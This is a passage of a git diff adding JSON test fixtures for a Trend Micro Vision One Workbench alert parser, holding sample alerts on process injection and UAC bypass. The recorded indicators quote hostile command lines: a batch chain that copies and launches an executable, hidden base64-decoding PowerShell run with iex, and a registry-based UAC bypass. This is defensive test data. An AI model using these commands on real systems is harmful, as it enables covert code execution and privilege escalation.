\"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3" + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json new file mode 100644 index 000000000..6598afe24 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json @@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": 